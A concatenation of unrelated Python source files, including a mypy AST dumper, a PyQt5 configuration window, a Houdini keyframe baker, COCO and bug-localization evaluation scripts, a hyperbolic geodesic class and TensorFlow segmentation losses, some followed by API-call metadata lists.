return self.dump(a, o)
def visit_with_stmt(self, o):
a = []
for i in range(len(o.expr)):
a.append(('Expr', [o.expr[i]]))
if o.name[i]:
a.append(('Name', [o.name[i]]))
return self.dump(a + [o.body], o)
def visit_print_stmt(self, o):
a = o.args[:]
if o.newline:
a.append('Newline')
return self.dump(a, o)
# Expressions
# Simple expressions
def visit_int_expr(self, o):
return 'IntExpr({})'.format(o.value)
def visit_str_expr(self, o):
return 'StrExpr({})'.format(self.str_repr(o.value))
def visit_bytes_expr(self, o):
return 'BytesExpr({})'.format(self.str_repr(o.value))
def visit_unicode_expr(self, o):
return 'UnicodeExpr({})'.format(self.str_repr(o.value))
def str_repr(self, s):
s = re.sub(r'\\u[0-9a-fA-F]{4}', lambda m: '\\' + m.group(0), s)
return re.sub('[^\\x20-\\x7e]',
lambda m: r'\u%.4x' % ord(m.group(0)), s)
def visit_float_expr(self, o):
return 'FloatExpr({})'.format(o.value)
def visit_paren_expr(self, o):
return self.dump([o.expr], o)
def visit_name_expr(self, o):
return (short_type(o) + '(' + self.pretty_name(o.name, o.kind,
o.fullname, o.is_def)
+ ')')
def pretty_name(self, name, kind, fullname, is_def):
n = name
if is_def:
n += '*'
if kind == mypy.nodes.GDEF or (fullname != name and
fullname is not None):
# Append fully qualified name for global references.
n += ' [{}]'.format(fullname)
elif kind == mypy.nodes.LDEF:
# Add tag to signify a local reference.
n += ' [l]'
elif kind == mypy.nodes.MDEF:
# Add tag to signify a member reference.
n += ' [m]'
return n
def visit_member_expr(self, o):
return self.dump([o.expr, self.pretty_name(o.name, o.kind, o.fullname,
o.is_def)], o)
def visit_call_expr(self, o):
if o.analyzed:
return o.analyzed.accept(self)
args = []
extra = []
for i, kind in enumerate(o.arg_kinds):
if kind in [mypy.nodes.ARG_POS, mypy.nodes.ARG_STAR]:
args.append(o.args[i])
if kind == mypy.nodes.ARG_STAR:
extra.append('VarArg')
elif kind == mypy.nodes.ARG_NAMED:
extra.append(('KwArgs', [o.arg_names[i], o.args[i]]))
elif kind == mypy.nodes.ARG_STAR2:
extra.append(('DictVarArg', [o.args[i]]))
else:
raise RuntimeError('unknown kind %d' % kind)
return self.dump([o.callee, ('Args', args)] + extra, o)
def visit_op_expr(self, o):
return self.dump([o.op, o.left, o.right], o)
def visit_cast_expr(self, o):
return self.dump([o.expr, o.type], o)
def visit_unary_expr(self, o):
return self.dump([o.op, o.expr], o)
def visit_list_expr(self, o):
return self.dump(o.items, o)
def visit_dict_expr(self, o):
return self.dump([[k, v] for k, v in o.items], o)
def visit_set_expr(self, o):
return self.dump(o.items, o)
def visit_tuple_expr(self, o):
return self.dump(o.items, o)
def visit_index_expr(self, o):
if o.analyzed:
return o.analyzed.accept(self)
return self.dump([o.base, o.index], o)
def visit_super_expr(self, o):
return self.dump([o.name], o)
def visit_undefined_expr(self, o):
return 'UndefinedExpr:{}({})'.format(o.line, o.type)
def visit_type_application(self, o):
return self.dump([o.expr, ('Types', o.types)], o)
def visit_type_var_expr(self, o):
if o.values:
return self.dump([('Values', o.values)], o)
else:
return 'TypeVarExpr:{}()'.format(o.line)
def visit_func_expr(self, o):
a = self.func_helper(o)
return self.dump(a, o)
def visit_generator_expr(self, o):
# FIX types
return self.dump([o.left_expr, o.index, o.right_expr, o.condition], o)
def visit_list_comprehension(self, o):
return self.dump([o.generator], o)
def visit_conditional_expr(self, o):
return self.dump([('Condition', [o.cond]), o.if_expr, o.else_expr], o)
def visit_slice_expr(self, o):
a = [o.begin_index, o.end_index, o.stride]
if not a[0]:
a[0] = '<empty>'
if not a[1]:
a[1] = '<empty>'
return self.dump(a, o)
def visit_coerce_expr(self, o):
return self.dump([o.expr, ('Types', [o.target_type, o.source_type])],
o)
def visit_type_expr(self, o):
return self.dump([str(o.type)], o)
def visit_filter_node(self, o):
# These are for convenience. These node types are not defined in the
# parser module.
pass
| [
"mypy.util.short_type"
] | [((789, 804), 'mypy.util.short_type', 'short_type', (['obj'], {}), '(obj)\n', (799, 804), False, 'from mypy.util import dump_tagged, short_type\n'), ((8895, 8908), 'mypy.util.short_type', 'short_type', (['o'], {}), '(o)\n', (8905, 8908), False, 'from mypy.util import dump_tagged, short_type\n')] |
#
# General-purpose Photovoltaic Device Model - a drift diffusion base/Shockley-Read-Hall
# model for 1st, 2nd and 3rd generation solar cells.
# Copyright (C) 2008-2022 <NAME> r.<EMAIL>.<EMAIL> at googlemail.com
#
# https://www.gpvdm.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License v2.0, as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
## @package config_window
# Configuration window.
#
import os
from icon_lib import icon_get
#qt
from PyQt5.QtCore import QSize, Qt
from PyQt5.QtWidgets import QWidget,QVBoxLayout,QToolBar,QSizePolicy,QAction,QTabWidget
from PyQt5.QtGui import QPainter,QIcon
#python modules
import webbrowser
#windows
from tab import tab_class
from PyQt5.QtCore import pyqtSignal
from global_objects import global_object_run
from inp import inp
from cal_path import get_sim_path
from QWidgetSavePos import QWidgetSavePos
from css import css_apply
from gpvdm_json import gpvdm_data
class class_config_window(QWidgetSavePos):
changed = pyqtSignal()
def callback_tab_changed(self):
self.changed.emit()
global_object_run("ribbon_configure_dump_refresh")
def __init__(self,files,description,title=_("Configure"),icon="preferences-system",data=gpvdm_data()):
QWidgetSavePos.__init__(self,"config_window")
self.data=data
self.toolbar=QToolBar()
self.toolbar.setToolButtonStyle( Qt.ToolButtonTextUnderIcon)
self.toolbar.setIconSize(QSize(48, 48))
self.setFixedSize(900, 600)
self.setWindowIcon(icon_get(icon))
self.setWindowTitle(title+" (https://www.gpvdm.com)")
self.main_vbox = QVBoxLayout()
spacer = QWidget()
spacer.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.toolbar.addWidget(spacer)
self.undo = QAction(icon_get("help"), _("Help"), self)
self.undo.setStatusTip(_("Help"))
self.undo.triggered.connect(self.callback_help)
self.toolbar.addAction(self.undo)
self.main_vbox.addWidget(self.toolbar)
self.notebook = QTabWidget()
css_apply(self.notebook,"tab_default.css")
self.notebook.setMovable(True)
self.main_vbox.addWidget(self.notebook)
if (len(files)>0):
for i in range(0,len(files)):
file_name=files[i]
tab=tab_class(file_name,data=self.data)
self.notebook.addTab(tab,description[i])
self.setLayout(self.main_vbox)
def callback_help(self):
webbrowser.open('http://www.gpvdm.com/man/index.html')
| [
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtCore.pyqtSignal",
"PyQt5.QtWidgets.QToolBar",
"global_objects.global_object_run",
"webbrowser.open",
"tab.tab_class",
"icon_lib.icon_get",
"QWidgetSavePos.QWidgetSavePos.__init__",
"css.css_apply",
"gpvdm_json.gpvdm_data",
"PyQt5.QtWidgets.QTabWidget",
"PyQt... | [((1551, 1563), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', ([], {}), '()\n', (1561, 1563), False, 'from PyQt5.QtCore import pyqtSignal\n'), ((1622, 1672), 'global_objects.global_object_run', 'global_object_run', (['"""ribbon_configure_dump_refresh"""'], {}), "('ribbon_configure_dump_refresh')\n", (1639, 1672), False, 'from global_objects import global_object_run\n'), ((1763, 1775), 'gpvdm_json.gpvdm_data', 'gpvdm_data', ([], {}), '()\n', (1773, 1775), False, 'from gpvdm_json import gpvdm_data\n'), ((1780, 1826), 'QWidgetSavePos.QWidgetSavePos.__init__', 'QWidgetSavePos.__init__', (['self', '"""config_window"""'], {}), "(self, 'config_window')\n", (1803, 1826), False, 'from QWidgetSavePos import QWidgetSavePos\n'), ((1858, 1868), 'PyQt5.QtWidgets.QToolBar', 'QToolBar', ([], {}), '()\n', (1866, 1868), False, 'from PyQt5.QtWidgets import QWidget, QVBoxLayout, QToolBar, QSizePolicy, QAction, QTabWidget\n'), ((2119, 2132), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (2130, 2132), False, 'from PyQt5.QtWidgets import QWidget, QVBoxLayout, QToolBar, QSizePolicy, QAction, QTabWidget\n'), ((2145, 2154), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2152, 2154), False, 'from PyQt5.QtWidgets import QWidget, QVBoxLayout, QToolBar, QSizePolicy, QAction, QTabWidget\n'), ((2500, 2512), 'PyQt5.QtWidgets.QTabWidget', 'QTabWidget', ([], {}), '()\n', (2510, 2512), False, 'from PyQt5.QtWidgets import QWidget, QVBoxLayout, QToolBar, QSizePolicy, QAction, QTabWidget\n'), ((2515, 2558), 'css.css_apply', 'css_apply', (['self.notebook', '"""tab_default.css"""'], {}), "(self.notebook, 'tab_default.css')\n", (2524, 2558), False, 'from css import css_apply\n'), ((2864, 2918), 'webbrowser.open', 'webbrowser.open', (['"""http://www.gpvdm.com/man/index.html"""'], {}), "('http://www.gpvdm.com/man/index.html')\n", (2879, 2918), False, 'import webbrowser\n'), ((1959, 1972), 'PyQt5.QtCore.QSize', 'QSize', (['(48)', '(48)'], {}), '(48, 48)\n', (1964, 1972), False, 'from PyQt5.QtCore import QSize, Qt\n'), ((2026, 2040), 'icon_lib.icon_get', 'icon_get', (['icon'], {}), '(icon)\n', (2034, 2040), False, 'from icon_lib import icon_get\n'), ((2280, 2296), 'icon_lib.icon_get', 'icon_get', (['"""help"""'], {}), "('help')\n", (2288, 2296), False, 'from icon_lib import icon_get\n'), ((2720, 2756), 'tab.tab_class', 'tab_class', (['file_name'], {'data': 'self.data'}), '(file_name, data=self.data)\n', (2729, 2756), False, 'from tab import tab_class\n')] |
"""
bakes houdini chanel expression into
keys on each frame in the timeline
Houdini 15.0
todo:
- automatical parm selection
"""
__version__ = 'v0.3'
__author__ = 'github/danielforgacs'
import hou
def bake_parm(parm):
values = []
start, end = get_frame_range()
end += 1
values = get_values(start, end, parm)
parm.deleteAllKeyframes()
bake_values(start, end, parm, values)
def get_values(start, end, parm):
vals = []
for frame in range( start, end):
vals.append(parm.evalAtFrame(frame))
return vals
def bake_values(start, end, parm, values):
for frame in range( start, end):
keyframe = hou.Keyframe()
keyframe.setValue(values[frame - start])
keyframe.setFrame(frame)
keyframe.setExpression('spline()')
parm.setKeyframe(keyframe)
def get_frame_range():
get = hou.expandString
start, end = (int(get('$FSTART')), int(get('$FEND')))
return (start, end)
def main():
parm = hou.parm('/obj/geo1/rx')
bake_parm(parm)
| [
"hou.parm",
"hou.Keyframe"
] | [((1073, 1097), 'hou.parm', 'hou.parm', (['"""/obj/geo1/rx"""'], {}), "('/obj/geo1/rx')\n", (1081, 1097), False, 'import hou\n'), ((712, 726), 'hou.Keyframe', 'hou.Keyframe', ([], {}), '()\n', (724, 726), False, 'import hou\n')] |
"""
Runs the coco-supplied cocoeval script to evaluate detections
outputted by using the output_coco_json flag in eval.py.
"""
import argparse
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
parser = argparse.ArgumentParser(description='COCO Detections Evaluator')
parser.add_argument('--bbox_det_file', default='results/bbox_detections.json', type=str)
parser.add_argument('--mask_det_file', default='results/mask_detections.json', type=str)
parser.add_argument('--gt_ann_file', default='data/scripts/coco/annotations/instances_val2017.json', type=str)
parser.add_argument('--eval_type', default='both', choices=['bbox', 'mask', 'both'], type=str)
args = parser.parse_args()
if __name__ == '__main__':
eval_bbox = (args.eval_type in ('bbox', 'both'))
eval_mask = (args.eval_type in ('mask', 'both'))
print('Loading annotations...')
gt_annotations = COCO(args.gt_ann_file)
if eval_bbox:
bbox_dets = gt_annotations.loadRes(args.bbox_det_file)
if eval_mask:
mask_dets = gt_annotations.loadRes(args.mask_det_file)
if eval_bbox:
print('\nEvaluating BBoxes:')
bbox_eval = COCOeval(gt_annotations, bbox_dets, 'bbox')
bbox_eval.evaluate()
bbox_eval.accumulate()
bbox_eval.summarize()
if eval_mask:
print('\nEvaluating Masks:')
bbox_eval = COCOeval(gt_annotations, mask_dets, 'segm')
bbox_eval.evaluate()
bbox_eval.accumulate()
bbox_eval.summarize()
| [
"pycocotools.coco.COCO",
"pycocotools.cocoeval.COCOeval",
"argparse.ArgumentParser"
] | [((233, 297), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""COCO Detections Evaluator"""'}), "(description='COCO Detections Evaluator')\n", (256, 297), False, 'import argparse\n'), ((898, 920), 'pycocotools.coco.COCO', 'COCO', (['args.gt_ann_file'], {}), '(args.gt_ann_file)\n', (902, 920), False, 'from pycocotools.coco import COCO\n'), ((1127, 1170), 'pycocotools.cocoeval.COCOeval', 'COCOeval', (['gt_annotations', 'bbox_dets', '"""bbox"""'], {}), "(gt_annotations, bbox_dets, 'bbox')\n", (1135, 1170), False, 'from pycocotools.cocoeval import COCOeval\n'), ((1305, 1348), 'pycocotools.cocoeval.COCOeval', 'COCOeval', (['gt_annotations', 'mask_dets', '"""segm"""'], {}), "(gt_annotations, mask_dets, 'segm')\n", (1313, 1348), False, 'from pycocotools.cocoeval import COCOeval\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from rest_framework.viewsets import GenericViewSet
from rest_framework import mixins
from irekua_database import models
from irekua_rest_api import serializers
from irekua_rest_api import utils
from irekua_rest_api.permissions import IsAdmin
from irekua_rest_api.permissions import IsDeveloper
from irekua_rest_api.permissions import ReadOnly
class TermViewSet(mixins.UpdateModelMixin,
mixins.RetrieveModelMixin,
mixins.DestroyModelMixin,
utils.CustomViewSetMixin,
GenericViewSet):
queryset = models.Term.objects.all() # pylint: disable=E1101
serializer_mapping = utils.SerializerMapping.from_module(
serializers.terms.terms)
permission_mapping = utils.PermissionMapping(
default=IsDeveloper | IsAdmin | ReadOnly)
| [
"irekua_database.models.Term.objects.all",
"irekua_rest_api.utils.SerializerMapping.from_module",
"irekua_rest_api.utils.PermissionMapping"
] | [((638, 663), 'irekua_database.models.Term.objects.all', 'models.Term.objects.all', ([], {}), '()\n', (661, 663), False, 'from irekua_database import models\n'), ((715, 775), 'irekua_rest_api.utils.SerializerMapping.from_module', 'utils.SerializerMapping.from_module', (['serializers.terms.terms'], {}), '(serializers.terms.terms)\n', (750, 775), False, 'from irekua_rest_api import utils\n'), ((811, 876), 'irekua_rest_api.utils.PermissionMapping', 'utils.PermissionMapping', ([], {'default': '(IsDeveloper | IsAdmin | ReadOnly)'}), '(default=IsDeveloper | IsAdmin | ReadOnly)\n', (834, 876), False, 'from irekua_rest_api import utils\n')] |
from typing import Dict
from jina import Document, DocumentArray, Flow
from docarray.document.generators import from_csv
from random import randint
with open("Data.csv") as file:
movies = DocumentArray(
from_csv(file, field_resolver={'Summary': 'text'})
)
movies=movies.shuffle(seed=randint)
for i in range(len(movies)):
movies[i].text=movies[i].text+f"{movies[i].tags.fields['Genres'].string_value}"+f"{movies[i].tags.fields['Title'].string_value}"
print(movies[0].tags.fields['Title'].string_value)
#print is just an example to see the parameters of movies docArray | [
"docarray.document.generators.from_csv"
] | [((216, 266), 'docarray.document.generators.from_csv', 'from_csv', (['file'], {'field_resolver': "{'Summary': 'text'}"}), "(file, field_resolver={'Summary': 'text'})\n", (224, 266), False, 'from docarray.document.generators import from_csv\n')] |
#
# Copyright (C) 2020 IBM. All Rights Reserved.
#
# See LICENSE.txt file in the root directory
# of this source tree for licensing information.
#
import json
from typing import List, Dict
from clai.server.searchlib.providers import Provider
class StackExchange(Provider):
def __init__(self, name: str, description: str, section: dict):
super().__init__(name, description, section)
self.__log_debug__("UNIX StackExchange provider initialized")
def call(self, query: str, limit: int = 1, **kwargs):
self.__log_debug__(
f"call(query={query}, limit={str(limit)}), **kwargs={str(kwargs)})"
)
payload = {"text": query, "limit": limit}
request = self.__send_post_request__(self.base_uri, data=json.dumps(payload))
if request.status_code == 200:
return request.json()["hits"]
return None
def extract_search_result(self, data: List[Dict]) -> str:
return data[0]["Answer"]
def get_printable_output(self, data: List[Dict]) -> str:
lines = [
f"Post: {data[0]['Content'][:384] + ' ...'}",
f"Answer: {data[0]['Answer'][:256] + ' ...'}",
f"Link: {data[0]['Url']}\n",
]
return "\n".join(lines)
| [
"json.dumps"
] | [((762, 781), 'json.dumps', 'json.dumps', (['payload'], {}), '(payload)\n', (772, 781), False, 'import json\n')] |
#!/usr/bin/env python3
# class file uppergeodesic.py
# started as a script to visualize what happens to hyperbolic plane
# if different isometries act on it
import geodesic as gd
import numpy as np
import numpy.linalg as lina
import matplotlib.pyplot as plt
# upper half space as the basic model
class UpperGeodesic(gd.Geodesic):
"""UpperGeodesic line in upper half space
takes endpoints on boundary as arguments
stores x and y data as points in x and y
string "inf" is point at infinity, i.e. y=inf
"""
xmin = 0
xmax = 0
ymin = 0 # just for consistency, shouldn't change
ymax = 0
inf = "inf"
def __init__(self, a, b, color="b", label=''):
"""initialize UpperGeodesic by endpoints
a, b - x values of the endpoints or "inf" if infinity
res is resolution
"""
super().__init__(a, b, color, label)
# adjust the boundaries of hyperbolic space
if self.start != UpperGeodesic.inf:
if self.start < UpperGeodesic.xmin:
UpperGeodesic.xmin = self.start
if self.end > UpperGeodesic.xmax:
UpperGeodesic.xmax = self.end
UpperGeodesic.ymax = (UpperGeodesic.xmax - UpperGeodesic.xmin)/2
@classmethod
def vertical(cls, real):
return cls(cls.inf, real)
@classmethod
def from_midpoint_and_radius(cls, m, r):
"""
m is only the real part of the circle thing
"""
return cls(m-r, m+r)
def sort_se(self):
"""sort start and end"""
if self.end == self.inf:
# just want to assume that the first value is inf if any
self.end = self.start
self.start = self.inf
if self.start != self.inf and self.end < self.start:
# swap a and self.end such that a < self.end
c = self.start
self.start = self.end
self.end = c
def get_data(self):
if self.start == UpperGeodesic.inf:
# vertical line
xs = [self.end, self.end]
ys = [self.ymin, self.ymax]
else:
# calculate semicircle
t = np.linspace(0, np.pi, self.res)
r = (self.end - self.start)/2
xs = r*(1 + np.cos(t)) + self.start
ys = r*np.sin(t)
return(xs, ys)
## the next two functions create new geodesics from existing ones
def new_geod(self, a, b, c, d):
"""return new geodesic by received by moebius trafo
apply the matrix
| a b |
| c d |
on the geodesic self and return the resulting geodesic
"""
start = self.apply_moebius(a, b, c, d, self.start)
end = self.apply_moebius(a, b, c, d, self.end)
return(UpperGeodesic(start, end))
def new_from_matrix(self, M):
return self.new_geod(M[0,0], M[0,1], M[1,0], M[1,1])
## apply transformations to ONE geodesic
def apply_matrix(self, M):
self.start = self.apply_moebius(M[0,0], M[0,1], M[1, 0], M[1,1],
self.start)
self.end = self.apply_moebius(M[0,0], M[0,1], M[1, 0], M[1,1],
self.end)
self.sort_se()
def translate_one_geod(self, dx):
if self.start != UpperGeodesic.inf:
self.start += dx
if self.end != UpperGeodesic.inf:
self.end += dx
def translate_one_at_zero(self, dx):
"""inverts at unit sphere, translates and inverts again"""
a = self.inversion_on_unit_circle(self.start)
b = self.inversion_on_unit_circle(self.end)
if a != UpperGeodesic.inf:
a += dx
if b != UpperGeodesic.inf:
b += dx
self.start = self.inversion_on_unit_circle(a)
self.end = self.inversion_on_unit_circle(b)
self.sort_se()
def rotate_one_geod(self, phi):
"""rotates the geodesic on upper half space
conjugate to a rotation around origin in the disc model
"""
if self.start == UpperGeodesic.inf:
alpha = -np.pi/2
else:
alpha = self.from_upper_to_disc(self.start)
beta = self.from_upper_to_disc(self.end)
alpha += phi
beta += phi
self.start = self.from_disc_to_upper(alpha)
self.end = self.from_disc_to_upper(beta)
self.sort_se()
def hyperbolic_translate_one(self, dmult=1.001):
"""translates one geodesic along UpperGeodesic(-1,1)"""
diag = (dmult + 1.0/dmult)/2.0
off = (1.0/dmult - dmult)/2.0
matrix = np.matrix([[diag, off], [off, diag]])
self.apply_matrix(matrix)
# tesselate hyperbolic space
@classmethod
def tesselate(self, depth=10):
"""Tesselates according to SL(2,Z)"""
g0 = UpperGeodesic(-1,1, "r")
g1 = UpperGeodesic(-0.5,self.inf, "r")
g2 = UpperGeodesic(0.5,self.inf, "r")
first = [g0,g1,g2]
for k in range(1, depth):
for g in first:
g.new_geod(1, k, 0, 1)
g.new_geod(1, -k, 0, 1)
kmax = len(UpperGeodesic.all_geods)
for geod in UpperGeodesic.all_geods[:kmax]:
temp = [geod.new_geod(0, -1, 1, 0)]
for k in range(1, 2*depth):
temp.append(geod.new_geod(1, 0, k, 1))
temp.append(geod.new_geod(1, 0, -k, 1))
for k in range(1, depth//2):
for t in temp:
t.new_geod(1, k, 0, 1)
t.new_geod(1, -k, 0, 1)
UpperGeodesic.xmin= -3
UpperGeodesic.xmax= 3
UpperGeodesic.ymax= 3
## plot commands
@classmethod
def set_plot_limits(cls):
highest = max(abs(i)
for i in [cls.ymin, cls.ymax, cls.xmax, cls.xmin])
cls.ax.axis([-highest, highest, 0, highest])
@classmethod
def plot_all(cls):
if UpperGeodesic.ymax <= UpperGeodesic.ymin:
UpperGeodesic.ymax = UpperGeodesic.ymin + 1 # else nothing to plot
super().plot_all()
| [
"numpy.sin",
"numpy.matrix",
"numpy.linspace",
"numpy.cos"
] | [((4613, 4650), 'numpy.matrix', 'np.matrix', (['[[diag, off], [off, diag]]'], {}), '([[diag, off], [off, diag]])\n', (4622, 4650), True, 'import numpy as np\n'), ((2161, 2192), 'numpy.linspace', 'np.linspace', (['(0)', 'np.pi', 'self.res'], {}), '(0, np.pi, self.res)\n', (2172, 2192), True, 'import numpy as np\n'), ((2302, 2311), 'numpy.sin', 'np.sin', (['t'], {}), '(t)\n', (2308, 2311), True, 'import numpy as np\n'), ((2259, 2268), 'numpy.cos', 'np.cos', (['t'], {}), '(t)\n', (2265, 2268), True, 'import numpy as np\n')] |
import os
import json
def evaluation(results, all_res, bug_data, storage_path):
map_value = 0
map_value_all = 0
ap_value = {}
count = 0
for bug_id, bug_cont in bug_data.items():
temp1 = 0
temp2 = 0
ap_tmp = 0
all_ap_tmp = 0
truth_num = 0
file_paths = bug_cont["fixed_files"]
if not len(file_paths) == 0:
for file_path in file_paths:
for i in range(all_res.shape[0]):
if all_res[i]["bug"][0] == bug_id.encode():
for j in range(all_res.shape[1]):
if all_res[i][j]["file"] == file_path.encode():
truth_num += 1
if truth_num > 0:
count += 1
if not truth_num == 0:
ap_value[bug_id] = {}
for i in range(results.shape[0]):
if results[i]["bug"][0] == bug_id.encode():
for j in range(results.shape[1]):
if results[i][j]["file"].decode() in file_paths:
temp1 += 1
ap_tmp += temp1/(j+1.0)
for i in range(all_res.shape[0]):
if all_res[i]["bug"][0] == bug_id.encode():
for j in range(all_res.shape[1]):
if all_res[i][j]["file"].decode() in file_paths:
temp2 += 1
all_ap_tmp += temp2/(j+1.0)
ap_value[bug_id]["AP@top10"] = ap_tmp / len(file_paths)
ap_value[bug_id]["AP@all"] = all_ap_tmp / len(file_paths)
past_ap_value = {}
if os.path.exists(os.path.join(storage_path, "evaluation.json")):
with open(os.path.join(storage_path, "evaluation.json"), "r") as f:
past_ap_value = json.load(f)
past_ap_value.update(ap_value)
with open(os.path.join(storage_path, "evaluation.json"), "w") as f:
json.dump(past_ap_value, f)
if not count == 0:
for ap in ap_value.values():
map_value_all += ap["AP@all"]
map_value += ap["AP@top10"]
map_value /= count
map_value_all /= count
else:
map_value = 0
map_value_all = 0
print("The MAP @ top 10 is", map_value)
print("The MAP @ all results is", map_value_all) | [
"json.load",
"os.path.join",
"json.dump"
] | [((1708, 1753), 'os.path.join', 'os.path.join', (['storage_path', '"""evaluation.json"""'], {}), "(storage_path, 'evaluation.json')\n", (1720, 1753), False, 'import os\n'), ((1993, 2020), 'json.dump', 'json.dump', (['past_ap_value', 'f'], {}), '(past_ap_value, f)\n', (2002, 2020), False, 'import json\n'), ((1860, 1872), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1869, 1872), False, 'import json\n'), ((1927, 1972), 'os.path.join', 'os.path.join', (['storage_path', '"""evaluation.json"""'], {}), "(storage_path, 'evaluation.json')\n", (1939, 1972), False, 'import os\n'), ((1774, 1819), 'os.path.join', 'os.path.join', (['storage_path', '"""evaluation.json"""'], {}), "(storage_path, 'evaluation.json')\n", (1786, 1819), False, 'import os\n')] |
"""
Created on Thu Sept 24 2020-
@author: <NAME>
GitHub username: esgomezm
"""
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras.losses import binary_crossentropy
import numpy as np
from tensorflow.keras import losses
# --------------------------------
# ## Unet with tf 2.0.0
# https://www.kaggle.com/advaitsave/tensorflow-2-nuclei-segmentation-unet
# ## binary weighted loss example
# https://www.kaggle.com/lyakaap/weighing-boundary-pixels-loss-script-by-keras2
# https://stackoverflow.com/questions/48555820/keras-binary-segmentation-add-weight-to-loss-function/48577360
# https://stackoverflow.com/questions/55213599/u-net-with-pixel-wise-weighted-cross-entropy-input-dimension-errors
# https://lars76.github.io/neural-networks/object-detection/losses-for-segmentation/
# https://stackoverflow.com/questions/46858016/keras-custom-loss-function-to-pass-arguments-other-than-y-true-and-y-pred
# --------------------------------
# weight: weighted tensor(same s☺hape as mask image)
def weighted_bce(y_true, y_pred, weight):
# avoiding overflow
epsilon = 1e-7
y_pred = K.clip(y_pred, epsilon, 1. - epsilon)
logit_y_pred = K.log(y_pred / (1. - y_pred))
# https://www.tensorflow.org/api_docs/python/tf/nn/weighted_cross_entropy_with_logits
loss = (1. - y_true) * logit_y_pred + (1. + (weight - 1.) * y_true) * \
(K.log(1. + K.exp(-K.abs(logit_y_pred))) + K.maximum(-logit_y_pred, 0.))
return K.sum(loss) / K.sum(weight)
def weighted_dice(y_true, y_pred, weight):
smooth = 1.
w, m1, m2 = weight * weight, y_true, y_pred
intersection = (m1 * m2)
score = (2. * K.sum(w * intersection) + smooth) / (K.sum(w * m1) + K.sum(w * m2) + smooth)
loss = 1. - K.sum(score)
return loss
def weighted_bce_dice_loss(y_true, y_pred):
y_true = K.cast(y_true, 'float32')
y_pred = K.cast(y_pred, 'float32')
# if we want to get same size of output, kernel size must be odd number
averaged_mask = K.pool2d(
y_true, pool_size=(11, 11), strides=(1, 1), padding='same', pool_mode='avg')
border = K.cast(K.greater(averaged_mask, 0.005), 'float32') * K.cast(K.less(averaged_mask, 0.995), 'float32')
weight = K.ones_like(averaged_mask)
w0 = K.sum(weight)
weight += border * 2
w1 = K.sum(weight)
weight *= (w0 / w1)
loss = weighted_bce(y_true, y_pred, weight) + weighted_dice(y_true, y_pred, weight)
return loss
def bce_loss(X):
# y_true, y_pred, weight = X
y_true, y_pred = X
loss = binary_crossentropy(y_true, y_pred)
loss = tf.expand_dims(loss, 3)
# loss = multiply([loss, weight])
return loss
def identity_loss(y_true, y_pred):
# return K.mean(y_pred, axis=-1)
return y_pred
def jaccard_multiple_output(y_true, y_pred, from_logits = True):
"""Define Jaccard index for multiple labels.
Args:
y_true (tensor): ground truth masks.
y_pred (tensor): predicted masks.
Return:
jac (tensor): Jaccard index value
"""
if from_logits:
# run activation to evaluate the jaccard index
y_pred_ = tf.sigmoid(y_pred)
y_pred_ = y_pred_ > 0.5
y_pred_ = tf.cast(y_pred_, dtype=tf.int8)
y_true_ = tf.cast(y_true, dtype=tf.int8)
TP = tf.math.count_nonzero(y_pred_ * y_true_)
FP = tf.math.count_nonzero(y_pred_ * (1 - y_true_))
FN = tf.math.count_nonzero((1 - y_pred_) * y_true_)
jac = tf.cond(tf.greater((TP + FP + FN), 0), lambda: TP / (TP + FP + FN),
lambda: tf.cast(0.000, dtype='float64'))
return jac
def jaccard_sparse(y_true, y_pred, skip_background=True):
"""Define Jaccard index (multi-class).
Args:
y_true (tensor): ground truth masks.
y_pred (tensor): predicted masks.
skip_background (bool, optional): skip background label.
Return:
jac (tensor): Jaccard index value
"""
# number of classes (last dimension of predictions)
num_classes = tf.shape(y_pred)[-1]
# one_hot representation of predicted segmentation
y_pred_ = tf.cast(y_pred, dtype=tf.int32)
y_pred_ = tf.one_hot(tf.math.argmax(y_pred_, axis=-1), num_classes, axis=-1)
# one_hot representation of ground truth segmentation
y_true_ = tf.cast(y_true[...,0], dtype=tf.int32)
y_true_ = tf.one_hot(y_true_, num_classes, axis=-1)
if skip_background:
y_pred_ = y_pred_[...,1:]
y_true_ = y_true_[...,1:]
TP = tf.math.count_nonzero(y_pred_ * y_true_)
FP = tf.math.count_nonzero(y_pred_ * (y_true_ - 1))
FN = tf.math.count_nonzero((y_pred_ - 1) * y_true_)
jac = tf.cond(tf.greater((TP + FP + FN), 0), lambda: TP / (TP + FP + FN),
lambda: tf.cast(0.000, dtype='float64'))
return jac
def jaccard_cce(y_true, y_pred, skip_background=True):
"""Define Jaccard index for multiple labels.
Args:
y_true (tensor): ground truth masks.
y_pred (tensor): predicted masks.
skip_background (bool, optional): skip 0-label from calculation
Return:
jac (tensor): Jaccard index value
"""
# We read the number of classes from the last dimension of the true labels
num_classes = tf.shape(y_true)[-1]
# one_hot representation of predicted segmentation after argmax
y_pred_ = tf.cast(y_pred, dtype=tf.float32)
y_pred_ = tf.one_hot(tf.math.argmax(y_pred_, axis=-1), num_classes, axis=-1)
# y_true is already one-hot encoded
y_true_ = tf.cast(y_true, dtype=tf.float32)
# skip background pixels from the Jaccard index calculation
if skip_background:
y_true_ = y_true_[...,1:]
y_pred_ = y_pred_[...,1:]
TP = tf.math.count_nonzero(y_pred_ * y_true_)
FP = tf.math.count_nonzero(y_pred_ * (y_true_ - 1))
FN = tf.math.count_nonzero((y_pred_ - 1) * y_true_)
jac = tf.cond(tf.greater((TP + FP + FN), 0), lambda: TP / (TP + FP + FN),
lambda: tf.cast(0.000, dtype='float64'))
return jac
## Code taken from DeepSTORM at ZeroCostDL4Mic. Please cite when using it
